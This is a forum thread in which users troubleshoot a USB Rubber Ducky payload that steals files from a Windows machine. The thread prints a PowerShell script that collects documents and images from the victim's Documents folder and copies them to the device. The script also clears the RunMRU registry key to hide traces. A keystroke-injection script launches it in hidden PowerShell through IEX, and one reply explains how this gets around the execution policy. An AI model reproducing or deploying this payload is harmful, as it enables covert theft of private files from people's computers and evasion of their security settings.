Oh, the loot folder has to exist.  Quick way to test is to just run the smbexfil script by itself on victim with RD plugged in with Storage available quacking nothing.  You should see it and be able to hand run the script with parameters to copy maybe just text files to it.  I do not have a RD anymore so unable to test with TD.  Replaced with BashBunny so do not know how the TD does things but do not see why this is not working.

 

Link to comment
Share on other sites
lucaM Newbie

lucaM

Posted
  • Author
Posted

Thank you for your explanation.

I report the steps I did after the mini changes.

- The USB Rubber Ducky label is "_"

- I created the "loot folder on ducky" folder and the "payloads" folder inside the USB Rubber Ducky

- Inside the "payloads" folder I inserted the file "DuckExfil.ps1", code below: 

# This is DuckExfil.ps1

function Invoke-DuckExfil
{
    $exfilfolder = "$env:userprofile\Documents\"
    $duckDrive = (gwmi -class win32_volume -f {label='_'}).Name
    $payloaddir = "payloads\"
    
    $duckpayloads = join-path $duckDrive $payloaddir
    $duckloot = join-path $duckdrive "loot folder on duck\"
    
    #Documents
    $docs = @("*.csv", "*.doc", "*.docx", "*.odt", "*.ods", "*.odg", "*.odp", "*.pdf", "*.pps", "*.txt", "*.tex", "*.ltx", "*.rtf", "*.xls", ".xlsx")
    
    #Images
    $img = @("*.gif", "*.jpg", "*.jpeg", "*.png", "*.tiff", "*.psd", "*.webp")
    
    #And other formats that I will not include because it is monotonous.
    
    #Combine into 1 arraylist    
    $filetypes = [System.Collections.ArrayList]::new()
    $filetypes.Addrange($docs)
    $filetypes.Addrange($img)
	
    #Get the smbexfil script and run it with parameters.
    IEX (gc (join-path $duckpayloads "Invoke-SMBExfil.ps1") -encoding String | Out-String)
    Invoke-SMBExfil $exfilfolder $duckloot $filetypes
    
    $wsh = New-Object -ComObject WScript.Shell
    $wsh.SendKeys('{CAPSLOCK}')
    sleep -m 250
    $wsh.SendKeys('{CAPSLOCK}')
    sleep -m 250
    $wsh.SendKeys('{CAPSLOCK}')
    sleep -m 250
    $wsh.SendKeys('{CAPSLOCK}')
    
    Remove-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
}

 

- Inside the USB Rubber Ducky I inserted the "inject.bin" file taken from the code: 

DELAY 1000
GUI r
DELAY 100
STRING powershell -NoP -W hidden -C {$duck=(join-path (gwmi -class win32_volume -f "label='_'").Name "payloads\DuckExfil.ps1");IEX (gc $duck -encoding String | Out-String);Invoke-DuckExfil}
ENTER

 

Initially, the powershell returned an error:

"Script execution is
disabled in the system in use. For more information, see about_Execution_Policies at
https://go.microsoft.com/fwlink/?LinkID=135170."

To enable scripts, I gave the following commands from a powershell with administrator privileges:

1) Set-ExecutionPolicy unrestricted
2) T
3) enter

Now, with the scripts enabled, I try to start the code. But nothing happens, I try in the powershell and nothing happens, not even an error notice.

I tried to delete "-w hidden" in the "inject.bin" file. The powershell closes after it opens, but first you see a red error.

If I try to run the "DuckExfil.ps1" file directly with powershell, nothing happens.

What am I doing wrong ?

 

Link to comment
Share on other sites
PoSHMagiC0de Rookie

PoSHMagiC0de

Posted
Posted

Sorry for the late response.  Busy guy.

Yeah, you shouldn't have to change the execution policy.  I test all my scripts on restricted.  Reason it should work is you are not (technically) running a script.  The powershell line actually is an inline command so will run even with restricted policy.  In the powershell one liners I am not running the other script but reading in the contents as a string and then running it as an expression.

I looked through your steps i see you maybe missing 1 final step.  Grab the script Invoke-SMBExfil.ps1 from my BBTPS project in my repo.  I linked it in the thread above.  The duckexfil uses that script to do its thing.  So you need that DuckExfil.ps1 and Invoke-SMBExfil.ps1 in the same folder.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...